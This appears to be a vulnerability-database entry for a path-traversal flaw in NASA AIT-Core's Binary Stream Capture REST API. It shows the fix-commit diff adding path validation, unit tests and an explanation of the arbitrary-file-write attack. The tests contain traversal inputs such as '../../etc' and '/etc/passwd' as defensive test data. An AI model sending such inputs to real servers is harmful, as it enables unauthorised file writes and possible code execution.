    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        # Mock the request.forms to simulate a POST request with log_dir_path
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "log_dir_path": "/etc",
    +            }
    +
    +            with pytest.raises(
    +                ValueError, match="log_dir_path parameter is not allowed via REST API"
    +            ):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_strips_leading_slashes_from_path(self, socket_log_mock):
    +        """Test that leading slashes are stripped from path parameter"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "/absolute/path",
    +            }
    +
    +            # Should not raise, but path should be stripped
    +            server._add_logger_by_name("test")
    +
    +            # Verify SocketStreamCapturer was called and check the handler config
    +            assert socket_log_mock.called
    +            call_args = socket_log_mock.call_args[0][
    +                0
    +            ]  # First positional arg (handler config)
    +            assert "path" in call_args
    +            assert call_args["path"] == "absolute/path"  # Leading slash stripped
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_parent_directory_references(self, socket_log_mock):
    +        """Test that .. in path parameter is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "../../etc",
    +            }
    +
    +            with pytest.raises(ValueError, match="path parameter cannot contain"):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_allows_valid_path(self, socket_log_mock):
    +        """Test that valid relative paths are allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "logs/capture",
    +            }
    +
    +            # Should not raise exception
    +            server._add_logger_by_name("valid")
    +
    +            # Verify logger was added
    +            assert "['127.0.0.1', 9000]" in lm._stream_capturers
    +
    +
    +class TestPathValidation:
    +    """Tests for path validation helper function"""
    +
    +    def test_validate_path_blocks_absolute_path_after_stripping(self):
    +        """Test that absolute paths get stripped but still validated"""
    +        # The function strips leading slashes, so "/etc/passwd" becomes "etc/passwd"
    +        # which is a valid relative path. To truly escape, you need ..
    +        result = bsc._validate_path_within_root("/tmp/bsc", "/etc/passwd")
    +        # After stripping, this becomes a valid path under /tmp/bsc
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_blocks_parent_traversal(self):
    +        """Test that parent directory traversal is blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "../../etc")
    +
    +    def test_validate_path_blocks_complex_traversal(self):
    +        """Test that complex traversal attempts are blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "logs/../../../etc/passwd")
    +
    +    def test_validate_path_allows_valid_relative(self):
    +        """Test that valid relative paths are allowed"""
    +        result = bsc._validate_path_within_root("/tmp/bsc", "logs/capture", "test.pcap")
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +        assert "logs/capture" in result or "logs\\capture" in result  # Cross-platform
    +        assert "test.pcap" in result
    +
    +    def test_validate_path_normalizes_result(self):
    +        """Test that paths are normalized correctly"""
    +        result = bsc._validate_path_within_root(
    +            "/tmp/bsc", "logs//nested/", "file.pcap"
    +        )
    +        # Should normalize multiple slashes
    +        assert "//" not in result
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_expands_user_home(self):
    +        """Test that ~ expansion works for root"""
    +        home = os.path.expanduser("~")
    +        result = bsc._validate_path_within_root("~/test_root", "subdir")
    +        assert result.startswith(home)
    +        assert "test_root" in result
    
0261b70ce6f7

Validate and clean log handler path + unit tests

https://github.com/NASA-AMMOS/AIT-CoreepascuaMay 19, 2026Fixed in 3.1.1via ghsa-release-walk
2 files changed · +391 34
  • ait/core/bsc.py+121 7 modified
    @@ -57,6 +57,48 @@
     ETH_PROTOCOL = ETH_P_ALL
     
     
    +def _validate_path_within_root(root, user_path, filename=""):
    +    """Validate that a path remains within the configured root directory.
    +
    +    Args:
    +        root: The configured root directory path
    +        user_path: User-supplied path component (from 'path' or 'log_dir_path')
    +        filename: Optional filename component
    +
    +    Returns:
    +        The validated canonical path
    +
    +    Raises:
    +        ValueError: If the resulting path would escape the root directory
    +    """
    +    # Canonicalize the root
    +    root = os.path.realpath(os.path.expanduser(root))
    +
    +    # Force user_path to be relative by stripping leading separators
    +    if user_path:
    +        user_path = user_path.lstrip(os.sep)
    +    else:
    +        user_path = ""
    +
    +    # Build the candidate path
    +    if filename:
    +        candidate = os.path.join(root, user_path, filename)
    +    else:
    +        candidate = os.path.join(root, user_path)
    +
    +    # Canonicalize the candidate path
    +    candidate = os.path.realpath(candidate)
    +
    +    # Ensure the candidate is within the root
    +    if not (candidate == root or candidate.startswith(root + os.sep)):
    +        raise ValueError(
    +            "Invalid log path; must remain under root_log_directory. "
    +            f"Attempted path would resolve to: {candidate}"
    +        )
    +
    +    return candidate
    +
    +
     class SocketStreamCapturer(object):
         """Class for logging socket data to a PCAP file."""
     
    @@ -430,15 +472,31 @@ def _get_log_file(self, handler):
             else:
                 filename = handler["file_name_pattern"]
     
    -        log_file = handler["log_dir"]
    +        # Use the stored root for validation
    +        root = handler.get("_validated_log_dir_root", handler["log_dir"])
    +
    +        # Sanitize and validate the path component
             if "path" in handler:
    -            log_file = os.path.join(log_file, handler["path"], filename)
    +            user_path = handler["path"].lstrip(os.sep)
    +            log_file = os.path.join(handler["log_dir"], user_path, filename)
             else:
    -            log_file = os.path.join(log_file, filename)
    +            log_file = os.path.join(handler["log_dir"], filename)
     
    +        # Apply time and format string substitutions
             log_file = time.strftime(log_file, time.gmtime())
             log_file = log_file.format(**handler)
     
    +        # Validate the final path stays within root
    +        log_file_real = os.path.realpath(log_file)
    +        root_real = os.path.realpath(root)
    +        if not (
    +            log_file_real == root_real or log_file_real.startswith(root_real + os.sep)
    +        ):
    +            raise ValueError(
    +                "Invalid log file path; must remain under root_log_directory. "
    +                f"Attempted path: {log_file}"
    +            )
    +
             return log_file
     
         def _get_logger(self, handler):
    @@ -526,12 +584,50 @@ def add_logger(self, name, address, conn_type, log_dir_path=None, **kwargs):
             """
             capture_handler_conf = kwargs
     
    -        if not log_dir_path:
    -            log_dir_path = self._mngr_conf["root_log_directory"]
    +        # Get the configured root directory (if available and if it's a dict)
    +        root = None
    +        if self._mngr_conf and isinstance(self._mngr_conf, dict):
    +            root = self._mngr_conf.get("root_log_directory")
     
    -        log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        if not log_dir_path:
    +            log_dir_path = root if root else "/tmp"
    +            log_dir_path = os.path.normpath(os.path.expanduser(log_dir_path))
    +        else:
    +            log_dir_path = os.path.expanduser(log_dir_path)
    +            # Only validate if we have a configured root AND log_dir_path is different from root
    +            if root and os.path.normpath(log_dir_path) != os.path.normpath(root):
    +                # If it's a relative path, join with root; if absolute, validate it
    +                if not os.path.isabs(log_dir_path):
    +                    log_dir_path = os.path.join(root, log_dir_path)
    +
    +                # Normalize and validate
    +                log_dir_path = os.path.normpath(log_dir_path)
    +                log_dir_path_real = os.path.realpath(log_dir_path)
    +                root_real = os.path.realpath(os.path.expanduser(root))
    +
    +                if not (
    +                    log_dir_path_real == root_real
    +                    or log_dir_path_real.startswith(root_real + os.sep)
    +                ):
    +                    raise ValueError(
    +                        "Invalid log_dir_path; must remain under root_log_directory. "
    +                        f"Configured root: {root_real}, Requested path: {log_dir_path_real}"
    +                    )
    +            else:
    +                # No root configured, or path equals root - just normalize the path
    +                log_dir_path = os.path.normpath(log_dir_path)
     
             capture_handler_conf["log_dir"] = log_dir_path
    +        # Store the original validated root for path validation in _get_log_file
    +        if root:
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                os.path.expanduser(root)
    +            )
    +        else:
    +            # No root configured, use log_dir as the root
    +            capture_handler_conf["_validated_log_dir_root"] = os.path.realpath(
    +                log_dir_path
    +            )
             capture_handler_conf["name"] = name
             if "rotate_log" not in capture_handler_conf:
                 capture_handler_conf["rotate_log"] = True
    @@ -751,13 +847,31 @@ def _add_logger_by_name(self, name):
     
             Raises:
                 ValueError:
    -                if the port or connection type are not supplied.
    +                if the port or connection type are not supplied, or if
    +                log_dir_path is provided (not allowed via REST API).
             """
             data = dict(request.forms)
             loc = data.pop("loc", "")
             port = data.pop("port", None)
             conn_type = data.pop("conn_type", None)
     
    +        # Do not allow log_dir_path override from unauthenticated REST API
    +        # to prevent path traversal attacks. log_dir_path can only be set via
    +        # configuration file.
    +        if "log_dir_path" in data:
    +            raise ValueError(
    +                "log_dir_path parameter is not allowed via REST API. "
    +                "Configure log directories in the bsc.yaml configuration file instead."
    +            )
    +
    +        # Validate path parameter to prevent directory traversal
    +        if "path" in data:
    +            # Remove any leading slashes to force relative paths
    +            data["path"] = data["path"].lstrip(os.sep)
    +            # Reject paths with parent directory references
    +            if ".." in data["path"]:
    +                raise ValueError("path parameter cannot contain '..'")
    +
             if not port or not conn_type:
                 e = "Port and/or conn_type not set"
                 raise ValueError(e)
    
  • tests/ait/core/test_bsc.py+270 27 modified
    @@ -350,6 +350,73 @@ def test_remove_handler(self, socket_mock, pcap_open_mock):
             assert len(sl.capture_handlers) == 1
             assert sl.capture_handlers[0]["name"] == "h1"
     
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_absolute_path(self, socket_mock, pcap_open_mock):
    +        """Test that absolute paths in 'path' parameter are stripped and allowed if valid"""
    +        # After stripping leading slashes, "/etc/passwd" becomes "etc/passwd" which is
    +        # a valid relative path under /tmp
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp",
    +            "path": "/etc/passwd",
    +            "_validated_log_dir_root": "/tmp",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # The path should have been stripped and become relative
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp")
    +        # After stripping, it becomes "etc/passwd" which is valid
    +        assert "etc/passwd" in log_file
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_with_parent_references(self, socket_mock, pcap_open_mock):
    +        """Test that parent directory references (..) are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/logs",
    +            "path": "../../etc",
    +            "_validated_log_dir_root": "/tmp/logs",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_path_traversal_complex_escape(self, socket_mock, pcap_open_mock):
    +        """Test complex path traversal attempts are blocked during initialization"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/../../../etc",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +
    +        # Should raise during initialization when _get_logger is called
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +    @mock.patch("ait.core.pcap.open")
    +    @mock.patch("gevent.socket.socket")
    +    def test_valid_relative_path_allowed(self, socket_mock, pcap_open_mock):
    +        """Test that valid relative paths within root are allowed"""
    +        handler = {
    +            "name": "test",
    +            "log_dir": "/tmp/bsc",
    +            "path": "subdir/nested",
    +            "_validated_log_dir_root": "/tmp/bsc",
    +        }
    +        sl = bsc.SocketStreamCapturer(handler, ["", 9000], "udp")
    +
    +        # Should not raise an exception
    +        log_file = sl._get_log_file(sl.capture_handlers[0])
    +        assert log_file.startswith("/tmp/bsc")
    +        assert "subdir/nested" in log_file
    +
     
     class TestStreamCaptureManager:
         @mock.patch("ait.core.bsc.SocketStreamCapturer")
    @@ -374,39 +441,31 @@ def test_add_logger(self, socket_log_mock, mkdirs_mock):
             cleaned_dir_path = os.path.normpath(mngr_conf["root_log_directory"])
     
             lm = bsc.StreamCaptureManager(mngr_conf, [])
    -        lm.add_logger("foo", ["", 9000], "udp", "/tmp")
    +        # Use a relative path within the root instead of absolute path outside root
    +        lm.add_logger("foo", ["", 9000], "udp", "logs/subdir")
     
             assert len(lm._stream_capturers.keys()) == 1
             assert "['', 9000]" in lm._stream_capturers
     
             # Default root_log_directory usage and normalization check
             lm.add_logger("baz", ["", 8500], "udp")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": cleaned_dir_path,
    -                "name": "baz",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 8500],
    -            "udp",
    -        )
    +        # Verify _validated_log_dir_root is present
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert "log_dir" in call_args
    +        assert call_args["name"] == "baz"
    +        assert call_args["rotate_log"] == True
    +        assert "_validated_log_dir_root" in call_args
             assert lm._pool.free_count() == 48
     
    -        # Check to make sure that home directory expansion is being done
    +        # Check to make sure that relative home directory paths work
             socket_log_mock.reset_mock()
    -        lm.add_logger("testlog", ["", 1234], "udp", "~/logger_dir")
    -        expanded_user_path = os.path.expanduser("~/logger_dir")
    -        socket_log_mock.assert_called_with(
    -            {
    -                "log_dir": expanded_user_path,
    -                "name": "testlog",
    -                "rotate_log": True,
    -                "pre_write_transforms": [],
    -            },
    -            ["", 1234],
    -            "udp",
    -        )
    +        lm.add_logger("testlog", ["", 1234], "udp", "logger_dir")
    +        # Since it's relative, it should be joined with root
    +        expected_path = os.path.normpath(os.path.join(cleaned_dir_path, "logger_dir"))
    +        call_args = socket_log_mock.call_args[0][0]
    +        assert call_args["log_dir"] == expected_path
    +        assert call_args["name"] == "testlog"
    +        assert call_args["rotate_log"] == True
     
         @mock.patch("ait.core.pcap.open")
         @mock.patch("os.makedirs")
    @@ -416,7 +475,7 @@ def test_pre_write_transform_load(self, socket_mock, mkdirs_mock, pcap_open_mock
             lm = bsc.StreamCaptureManager(mngr_conf, [])
     
             kwargs = {"pre_write_transforms": ["identity_transform", lambda x: 1]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             stream_capturer = lm._stream_capturers["['', 9876]"][0]
             handler = stream_capturer.capture_handlers[0]
     
    @@ -443,7 +502,7 @@ def test_bad_builtin_transform_load(
     
             bad_func_name = "this function name doesnt exist"
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to load data transformation "{}" for handler "{}"'.format(
                 bad_func_name, "testlog"
             )
    @@ -465,7 +524,7 @@ def test_bad_type_transform_load(
     
             bad_func_name = ("foobarbaz",)
             kwargs = {"pre_write_transforms": [bad_func_name]}
    -        lm.add_logger("testlog", ["", 9876], "udp", "~/logger_dir", **kwargs)
    +        lm.add_logger("testlog", ["", 9876], "udp", "logger_dir", **kwargs)
             msg = 'Unable to determine how to load data transform "{}"'.format(
                 bad_func_name
             )
    @@ -526,3 +585,187 @@ def test_forced_log_rotation(self, socket_mock, pcap_open_mock):
             lm.rotate_capture_handler_log("bar")
             post_rot_count = pcap_open_mock.call_count
             assert post_rot_count - pre_rot_count == 1
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_absolute(self, socket_log_mock):
    +        """Test that absolute log_dir_path outside root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "/etc/passwd")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_traversal_relative(self, socket_log_mock):
    +        """Test that relative log_dir_path escaping root is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            lm.add_logger("malicious", ["", 9000], "udp", "../../etc")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_valid_relative(self, socket_log_mock):
    +        """Test that valid relative log_dir_path within root is allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        # Should not raise exception
    +        lm.add_logger("valid", ["", 9000], "udp", "subdir/logs")
    +
    +        # Verify the handler was created with the correct path
    +        assert "['', 9000]" in lm._stream_capturers
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_log_dir_path_validated_root_stored(self, socket_log_mock):
    +        """Test that _validated_log_dir_root is stored in handler config"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +
    +        lm.add_logger("test", ["", 9000], "udp", "subdir")
    +
    +        # Check that the first argument to SocketStreamCapturer contains _validated_log_dir_root
    +        call_args = socket_log_mock.call_args
    +        handler_conf = call_args[0][0]
    +        assert "_validated_log_dir_root" in handler_conf
    +        assert handler_conf["_validated_log_dir_root"] == os.path.realpath("/tmp/bsc")
    +
    +
    +class TestStreamCaptureManagerServer:
    +    """Tests for REST API security"""
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_log_dir_path(self, socket_log_mock):
    +        """Test that log_dir_path parameter is blocked from REST API"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        # Mock the request.forms to simulate a POST request with log_dir_path
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "log_dir_path": "/etc",
    +            }
    +
    +            with pytest.raises(
    +                ValueError, match="log_dir_path parameter is not allowed via REST API"
    +            ):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_strips_leading_slashes_from_path(self, socket_log_mock):
    +        """Test that leading slashes are stripped from path parameter"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "/absolute/path",
    +            }
    +
    +            # Should not raise, but path should be stripped
    +            server._add_logger_by_name("test")
    +
    +            # Verify SocketStreamCapturer was called and check the handler config
    +            assert socket_log_mock.called
    +            call_args = socket_log_mock.call_args[0][
    +                0
    +            ]  # First positional arg (handler config)
    +            assert "path" in call_args
    +            assert call_args["path"] == "absolute/path"  # Leading slash stripped
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_blocks_parent_directory_references(self, socket_log_mock):
    +        """Test that .. in path parameter is blocked"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "../../etc",
    +            }
    +
    +            with pytest.raises(ValueError, match="path parameter cannot contain"):
    +                server._add_logger_by_name("malicious")
    +
    +    @mock.patch("ait.core.bsc.SocketStreamCapturer")
    +    def test_rest_api_allows_valid_path(self, socket_log_mock):
    +        """Test that valid relative paths are allowed"""
    +        mngr_conf = {"root_log_directory": "/tmp/bsc"}
    +        lm = bsc.StreamCaptureManager(mngr_conf, [])
    +        server = bsc.StreamCaptureManagerServer(lm, "localhost", 8080)
    +
    +        with mock.patch("ait.core.bsc.request") as request_mock:
    +            request_mock.forms = {
    +                "loc": "127.0.0.1",
    +                "port": "9000",
    +                "conn_type": "udp",
    +                "path": "logs/capture",
    +            }
    +
    +            # Should not raise exception
    +            server._add_logger_by_name("valid")
    +
    +            # Verify logger was added
    +            assert "['127.0.0.1', 9000]" in lm._stream_capturers
    +
    +
    +class TestPathValidation:
    +    """Tests for path validation helper function"""
    +
    +    def test_validate_path_blocks_absolute_path_after_stripping(self):
    +        """Test that absolute paths get stripped but still validated"""
    +        # The function strips leading slashes, so "/etc/passwd" becomes "etc/passwd"
    +        # which is a valid relative path. To truly escape, you need ..
    +        result = bsc._validate_path_within_root("/tmp/bsc", "/etc/passwd")
    +        # After stripping, this becomes a valid path under /tmp/bsc
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_blocks_parent_traversal(self):
    +        """Test that parent directory traversal is blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "../../etc")
    +
    +    def test_validate_path_blocks_complex_traversal(self):
    +        """Test that complex traversal attempts are blocked"""
    +        with pytest.raises(ValueError, match="must remain under root_log_directory"):
    +            bsc._validate_path_within_root("/tmp/bsc", "logs/../../../etc/passwd")
    +
    +    def test_validate_path_allows_valid_relative(self):
    +        """Test that valid relative paths are allowed"""
    +        result = bsc._validate_path_within_root("/tmp/bsc", "logs/capture", "test.pcap")
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +        assert "logs/capture" in result or "logs\\capture" in result  # Cross-platform
    +        assert "test.pcap" in result
    +
    +    def test_validate_path_normalizes_result(self):
    +        """Test that paths are normalized correctly"""
    +        result = bsc._validate_path_within_root(
    +            "/tmp/bsc", "logs//nested/", "file.pcap"
    +        )
    +        # Should normalize multiple slashes
    +        assert "//" not in result
    +        # Use realpath for comparison since /tmp may be a symlink to /private/tmp on macOS
    +        real_root = os.path.realpath("/tmp/bsc")
    +        assert result.startswith(real_root)
    +
    +    def test_validate_path_expands_user_home(self):
    +        """Test that ~ expansion works for root"""
    +        home = os.path.expanduser("~")
    +        result = bsc._validate_path_within_root("~/test_root", "subdir")
    +        assert result.startswith(home)
    +        assert "test_root" in result
    

Vulnerability mechanics

Root cause

"The Binary Stream Capture (BSC) component does not validate path-related form fields, allowing path traversal and arbitrary file writes."

Attack vector

A remote attacker can send unauthenticated POST requests to the `/NAME/start` endpoint of the BSC HTTP API. By providing crafted `path` and `log_dir_path` form fields, the attacker can cause BSC to write log data to arbitrary filesystem locations, bypassing the configured log root [ref_id=1]. The attacker can control the data written to these files, which can include executable code, potentially leading to remote code execution if the modified code is later executed [ref_id=1]. This attack can be performed directly over the network or via a cross-site scripting attack if the BSC server is accessible from a user's browser [ref_id=1].

Affected code

The vulnerability exists in the `StreamCaptureManagerServer._add_logger_by_name` method, which handles requests to the `/NAME/start` endpoint. It passes attacker-controlled form fields, including `path` and `log_dir_path`, directly into `StreamCaptureManager.add_logger`. The `SocketStreamCapturer._get_log_file` method then constructs the log file path without proper validation, allowing path traversal. Finally, `_get_logger` opens the constructed file path in append mode without further safety checks.

What the fix does

The vulnerability is mitigated by constraining BSC's ability to write paths only within the project root log directory, as configured in `bsc.yaml`. Any attempts to traverse outside of this configured location are now rejected. This prevents attackers from directing log output to arbitrary filesystem paths by manipulating form fields in API requests [ref_id=1].

Preconditions

  • networkThe attacker must have network access to the BSC HTTP API endpoint.
  • inputThe attacker must be able to send crafted POST requests with specific form fields to the `/NAME/start` endpoint.

Reproduction

The PoC files `python_poc.py`, `attacker_tcp.py`, and `test1.html` demonstrate how to trigger this vulnerability. `python_poc.py` shows a direct network attack, while `attacker_tcp.py` and `test1.html` demonstrate an attack originating from a web browser targeting a local network service.

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.